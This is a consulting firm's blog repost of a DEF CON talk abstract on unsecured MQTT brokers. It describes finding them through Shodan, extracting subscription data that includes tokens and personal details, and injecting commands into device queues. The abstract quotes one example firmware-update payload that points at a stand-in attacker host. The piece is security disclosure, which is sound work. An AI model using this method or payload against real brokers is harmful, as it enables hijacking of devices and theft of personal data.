Hojt Communication | MQTT IoT protocol completely open to hack on public internet
Hojt Communication is a consulting company focused on our clients need to rapidly bring the right product to the right market. We stand out due to our ability to combine skills in strategy, implementation, operations and technology with deep understanding about the connected world and the new levels of security and privacy protection that world brings.
vision,strategy,product,market,business development,marketing,mobility,Internet of Things,IoT,Security
post-template-default,single,single-post,postid-23256,single-format-standard,ajax_fade,page_not_loaded,,select-child-theme-ver-1.0.0,select-theme-ver-3.8.1,wpb-js-composer js-comp-ver-5.1.1,vc_responsive

MQTT IoT protocol completely open to hack on public internet

See on Scoop.itSecure communication
Lucas Lundgren Senior Security Consultant, FortConsult (Part of NCC Group)
Neal Hindocha Principal Consultant, FortConsult (Part of NCC Group)

The presentation will begin by discussing the protocol (http://mqtt.org/) and results from a simple query on shodan, showing the number of servers directly available on the internet. We will then go through the protocol specifications which shows that security is more or less non-existent. We are able to directly connect to many of the servers which are open to the internet, and following protocol specifications, see what devices they are communicating with.

We will show how its possible to extract data on all subscriptions available on the server using a ruby script, which basically gives a detailed list of the devices. However, it is not only the list of devices we are getting. The data returned by our script also contains things like session tokens (for web pages), social security numbers, phone numbers, names and other sensitive data used for one purpose or another in the communication to and from the devices.

We will show how messages can be posted into the message queues and in turn received by the devices that subscribe to the various queues. This means that we are able to issue commands targeting the range of devices we have discovered, that use this protocol. We have however also discovered that this is not limited to messages and commands, if supported by the device, we can actually issue firmware updated, simply by sending something similar to "FIRMWAREUPDATEHERE:http://www.attacker.com/filename.bin".

A specific example of what we can see and do is a home automation system we discovered. We got a list of every sensor and its status. Furthermore, we got exact GPS coordinates from the mobile app used to control the home automation. So in this case, not only were we able to control the system, we even knew when the owner was away.

The talk will move on to show various implementations where webclients and SQL servers are hooked in. Much of the communication data is stored in various databases, and because we have access, we can use MQTT to attack the database and web servers.

Multiple tools have been developed by us already to support testing the protocol and fuzzing endpoints. we will show the tools used in various demos and release them at the end of the talk! These tools are currently scripts containing various protocol implementations, that can be used to target servers and extract, or inject, data. We also have a small client that implements all interesting areas of the protocol which we use for server-to-client testing.

We believe this talk is going to have a significant impact on MQTT and anyone who uses it. This is an old protocol from 1999. Its fast and reliable, but its missing security.

We also be believe this talk will trigger a discussion about light-weight IoT protocols and security, which is much needed at this point in time.

Presentation slides:


An extremely important talk about the MQTT protocol used incorrectly over Internet. This protocol is widely used by IoT systems and it has NO security in itself. It must be added in the implementation, but this presentation shows that security has been completely neglected in many critical systems. Lucas shows how easy it is to gather data and manipulate, e.g. prisons, ATMs, Nuclear plants, smart homes, etc

See on media.defcon.org